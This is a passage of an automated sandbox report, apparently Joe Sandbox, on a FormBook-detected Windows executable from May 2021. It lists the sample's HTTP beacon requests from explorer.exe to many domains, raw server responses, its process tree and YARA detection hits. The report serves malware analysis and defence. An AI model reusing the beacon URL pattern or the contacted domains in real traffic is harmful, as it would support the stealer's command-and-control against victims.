3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache Server at www.cityofhouston.info Port 80</address></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  4192.168.2.44976551.222.80.11280C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  May 12, 2021 15:48:13.697396994 CEST6140OUTGET /i6rd/?gHSLCj58=ghT/ntM+diyN3YW/4q0tO05CJd4dCe68Gx0VtJcOz7kJ2fBcIsU6AMgtishNfwDLzL+S&9rJ=N8YdlZih HTTP/1.1
                                                                  Host: www.socialeconomic.net
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  May 12, 2021 15:48:13.830612898 CEST6141INHTTP/1.1 301 Moved Permanently
                                                                  Date: Wed, 12 May 2021 13:48:13 GMT
                                                                  Server: Apache
                                                                  Content-Security-Policy: upgrade-insecure-requests;
                                                                  Location: https://www.socialeconomic.net/i6rd/?gHSLCj58=ghT/ntM+diyN3YW/4q0tO05CJd4dCe68Gx0VtJcOz7kJ2fBcIsU6AMgtishNfwDLzL+S&9rJ=N8YdlZih
                                                                  Content-Length: 339
                                                                  Connection: close
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 6f 63 69 61 6c 65 63 6f 6e 6f 6d 69 63 2e 6e 65 74 2f 69 36 72 64 2f 3f 67 48 53 4c 43 6a 35 38 3d 67 68 54 2f 6e 74 4d 2b 64 69 79 4e 33 59 57 2f 34 71 30 74 4f 30 35 43 4a 64 34 64 43 65 36 38 47 78 30 56 74 4a 63 4f 7a 37 6b 4a 32 66 42 63 49 73 55 36 41 4d 67 74 69 73 68 4e 66 77 44 4c 7a 4c 2b 53 26 61 6d 70 3b 39 72 4a 3d 4e 38 59 64 6c 5a 69 68 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.socialeconomic.net/i6rd/?gHSLCj58=ghT/ntM+diyN3YW/4q0tO05CJd4dCe68Gx0VtJcOz7kJ2fBcIsU6AMgtishNfwDLzL+S&amp;9rJ=N8YdlZih">here</a>.</p></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  5192.168.2.44976681.88.52.8880C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  May 12, 2021 15:48:19.008239031 CEST6142OUTGET /i6rd/?gHSLCj58=87tzyM19Su4M9sklYGX+FxwUh158b1qmSh9f/APlSoINpVQ2gCQ5Erv1vAVp92mNDUWx&9rJ=N8YdlZih HTTP/1.1
                                                                  Host: www.toypoodlebreedershome.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  May 12, 2021 15:48:19.092015982 CEST6143INHTTP/1.1 404 Not Found
                                                                  Date: Wed, 12 May 2021 13:48:19 GMT
                                                                  Server: Apache
                                                                  Upgrade: h2,h2c
                                                                  Connection: Upgrade, close
                                                                  Accept-Ranges: bytes
                                                                  Transfer-Encoding: chunked
                                                                  Content-Type: text/html
                                                                  Data Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 33 64 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 23 66 66 66 3b 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 23 66 66 66 3b 20 2d 6d 6f 7a 2d 74 65 78 74 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 23 66 66 66 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 20 63 6f 6c 6f 72 3a 20 23 39 30 30 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 32 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 7d 0a 09 09 09 68 33 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 23 63 6f 6e 74 73 20 7b 20 6d 69 6e 2d 77 69 64 74 68 3a 36 34 30 70 78 3b 20 6d 61 72 67 69 6e 3a 20 33 30 70 78 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 70 61 64 64 69 6e 67 3a 20 34 30 70 78 20 32 30 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 20 2f 2a 77 69 64 74 68 3a 20 39 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 2a 2f 20 62 6f 72 64 65 72 3a 20 31 70 78 20 64 6f 74 74 65 64 20 23 39 39 39 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 23 65 65 65 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 0a 09 09 09 0d 0a 38 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                  Data Ascii: 113df<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <style type="text/css"> body { font-family: Arial,Helvetica Neue,Helvetica,sans-serif; text-align:center; text-shadow:0 1px #fff; -webkit-text-shadow:0 1px #fff; -moz-text-shadow:0 1px #fff; } h1 { font-size: 22px; color: #900; font-weight: bold; } h2 { font-size: 16px; color: #000000; font-weight: bold; }h3 { font-size: 16px; color: #000000; font-weight: normal; } #conts { min-width:640px; margin: 30px; background-color: #fff; padding: 40px 20px; font-size: 14px; /*width: 90%; height: 100%;*/ border: 1px dotted #999; background:#eee; } </style> <title>8d404 Not Found </title> </head> <body> <div id="conts">


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  6192.168.2.449768185.53.177.5380C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  May 12, 2021 15:48:24.287259102 CEST6154OUTGET /i6rd/?gHSLCj58=lFTIMkQ5ik6igxl0SADoA/l4wqgGqwWePHw2ryfpEDmwfQ+0wMbe0XdxLJthRM6xta9b&9rJ=N8YdlZih HTTP/1.1
                                                                  Host: www.ricdevan.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  May 12, 2021 15:48:24.329476118 CEST6155INHTTP/1.1 403 Forbidden
                                                                  Server: nginx
                                                                  Date: Wed, 12 May 2021 13:48:24 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  7192.168.2.44977023.227.38.7480C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  May 12, 2021 15:48:29.463149071 CEST6187OUTGET /i6rd/?gHSLCj58=/0C7Nd/5ZhwBGDRTMer0ywO01wFnuraj4upl6M1zLF0nwnsKqCnReLNuI6TuwxtThkOZ&9rJ=N8YdlZih HTTP/1.1
                                                                  Host: www.ximibabes.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  May 12, 2021 15:48:29.644690037 CEST6189INHTTP/1.1 403 Forbidden
                                                                  Date: Wed, 12 May 2021 13:48:29 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  X-Sorting-Hat-PodId: -1
                                                                  X-Dc: gcp-us-central1
                                                                  X-Request-ID: 975553ed-19fe-4a52-aebe-ef54f52968ad
                                                                  X-Download-Options: noopen
                                                                  X-Content-Type-Options: nosniff
                                                                  X-Permitted-Cross-Domain-Policies: none
                                                                  X-XSS-Protection: 1; mode=block
                                                                  CF-Cache-Status: DYNAMIC
                                                                  cf-request-id: 0a026f1db800002c3ef937b000000001
                                                                  Server: cloudflare
                                                                  CF-RAY: 64e41adc5b862c3e-FRA
                                                                  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                  Data Raw: 35 63 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d
                                                                  Data Ascii: 5c6<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  8192.168.2.449771192.64.147.16480C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  May 12, 2021 15:48:35.011543036 CEST6195OUTGET /i6rd/?gHSLCj58=kbJM45GZrQKbh6aR4KV/wVFZMmwDJvkUUs1obqo0rCdmSsWUtmFh0yx89FvYawyrRJzX&9rJ=N8YdlZih HTTP/1.1
                                                                  Host: www.sabaidiving.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  May 12, 2021 15:48:35.250890970 CEST6196INHTTP/1.1 404 Not Found
                                                                  Date: Wed, 12 May 2021 13:48:35 GMT
                                                                  Server: Apache/2.2.3 (CentOS)
                                                                  X-Powered-By: PHP/5.3.8
                                                                  Set-Cookie: session=4d36d09bac3145dfbd0fe2ea9e6a7871; expires=Wed, 12-May-2021 14:18:35 GMT; path=/
                                                                  Vary: Accept-Encoding,User-Agent
                                                                  P3P: CP="CAO PSA OUR"
                                                                  Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 31 Dec 2001 7:32:00 GMT
                                                                  Content-Length: 846
                                                                  Connection: close
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 3c 68 74 6d 6c 20 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 52 45 43 2d 68 74 6d 6c 34 30 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 73 61 62 61 69 64 69 76 69 6e 67 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 76 61 6c 75 65 3d 22 22 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 09 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 38 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 09 09 20 20 20 20 24 28 27 23 6d 61 69 6e 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 22 2f 63 66 2e 70 68 70 22 29 3b 0a 09 09 20 20 20 20 24 28 27 23 6d 61 69 6e 27 29 2e 63 73 73 28 27 76 69 73 69 62 69 6c 69 74 79 27 2c 20 27 76 69 73 69 62 6c 65 27 29 3b 0a 09 09 7d 29 3b 0a 0a 09 09 2f 2a 20 69 66 20 28 70 61 72 65 6e 74 2e 66 72 61 6d 65 73 2e 6c 65 6e 67 74 68 20 3e 20 30 29 0a 09 09 20 20 20 20 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 29 3b 20 2a 2f 0a 09 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 66 72 61 6d 65 73 65 74 20 72 6f 77 73 3d 22 31 30 30 25 2c 2a 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 6e 6f 22 20 62 6f 72 64 65 72 3d 22 30 22 20 66 72 61 6d 65 73 70 61 63 69 6e 67 3d 22 30 22 20 69 64 3d 22 66 72 61 6d 65 73 65 74 22 3e 0a 09 3c 66 72 61 6d 65 20 69 64 3d 22 6d 61 69 6e 22 20 73 72 63 3d 22 2f 63 66 2e 70 68 70 22 3e 3c 2f 66 72 61 6d 65 3e 0a 09 3c 66 72 61 6d 65 20 69 64 3d 22 73 75 62 31 22 20 73 72 63 3d 22 62 68 2e 70 68 70 3f 64 6d 3d 73 61 62 61 69 64 69 76 69 6e 67 2e 63 6f 6d 26 6b 77 3d 26 74 74 3d 34 64 33 36 64 30 39 62 61 63 33 31 34 35 64 66 62 64 30 66 65 32 65 61 39 65 36 61 37 38 37 31 26 74 79 3d 66 61 6c 73 65 22 20 73 74 79 6c 65 3d 22 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 22 3e 3c 2f 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 66 72 61 6d 65 73 65 74 3e 0a 3c 2f 68 74 6d 6c
                                                                  Data Ascii: <html xmlns="http://www.w3.org/TR/REC-html40"> <head><title>sabaidiving.com</title><meta name="keywords" value=""/><meta name="description" content=""> <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script> <script type="text/javascript">$(document).ready(function () { $('#main').attr('src', "/cf.php"); $('#main').css('visibility', 'visible');});/* if (parent.frames.length > 0) top.location.replace(document.location); */ </script> </head> <frameset rows="100%,*" frameborder="no" border="0" framespacing="0" id="frameset"><frame id="main" src="/cf.php"></frame><frame id="sub1" src="bh.php?dm=sabaidiving.com&kw=&tt=4d36d09bac3145dfbd0fe2ea9e6a7871&ty=false" style="visibility: hidden;"></frame> </frameset></html


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  9192.168.2.449772192.0.78.2480C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  May 12, 2021 15:48:40.409845114 CEST6198OUTGET /i6rd/?gHSLCj58=wbIaUdvQqzQbHKzWrifpae4yz+HPBnPf3VQSw8NlhdhOO9H/uFvMKdwnlncPTgk9QTjs&9rJ=N8YdlZih HTTP/1.1
                                                                  Host: www.onemoresysadmin.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  May 12, 2021 15:48:40.450537920 CEST6198INHTTP/1.1 301 Moved Permanently
                                                                  Server: nginx
                                                                  Date: Wed, 12 May 2021 13:48:40 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 162
                                                                  Connection: close
                                                                  Location: https://www.onemoresysadmin.com/i6rd/?gHSLCj58=wbIaUdvQqzQbHKzWrifpae4yz+HPBnPf3VQSw8NlhdhOO9H/uFvMKdwnlncPTgk9QTjs&9rJ=N8YdlZih
                                                                  X-ac: 2.hhn _dca
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                  Code Manipulations

                                                                  Statistics

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  Analysis Process: 350969bc_by_Libranalysis.exe PID: 6988 Parent PID: 5948

                                                                  General

                                                                  Start time:15:46:42
                                                                  Start date:12/05/2021
                                                                  Path:C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\350969bc_by_Libranalysis.exe'
                                                                  Imagebase:0xfb0000
                                                                  File size:924672 bytes
                                                                  MD5 hash:350969BC82EC33AF12ACF100C41EB4D1
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.664412012.0000000004449000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.664412012.0000000004449000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.664412012.0000000004449000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:low

                                                                  Analysis Process: 350969bc_by_Libranalysis.exe PID: 7100 Parent PID: 6988

                                                                  General

                                                                  Start time:15:46:46
                                                                  Start date:12/05/2021
                                                                  Path:C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
                                                                  Imagebase:0x30000
                                                                  File size:924672 bytes
                                                                  MD5 hash:350969BC82EC33AF12ACF100C41EB4D1
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  Analysis Process: 350969bc_by_Libranalysis.exe PID: 7140 Parent PID: 6988

                                                                  General

                                                                  Start time:15:46:46
                                                                  Start date:12/05/2021
                                                                  Path:C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
                                                                  Imagebase:0x230000
                                                                  File size:924672 bytes
                                                                  MD5 hash:350969BC82EC33AF12ACF100C41EB4D1
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  Analysis Process: 350969bc_by_Libranalysis.exe PID: 3416 Parent PID: 6988

                                                                  General

                                                                  Start time:15:46:47
                                                                  Start date:12/05/2021
                                                                  Path:C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
                                                                  Imagebase:0x8e0000
                                                                  File size:924672 bytes
                                                                  MD5 hash:350969BC82EC33AF12ACF100C41EB4D1
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
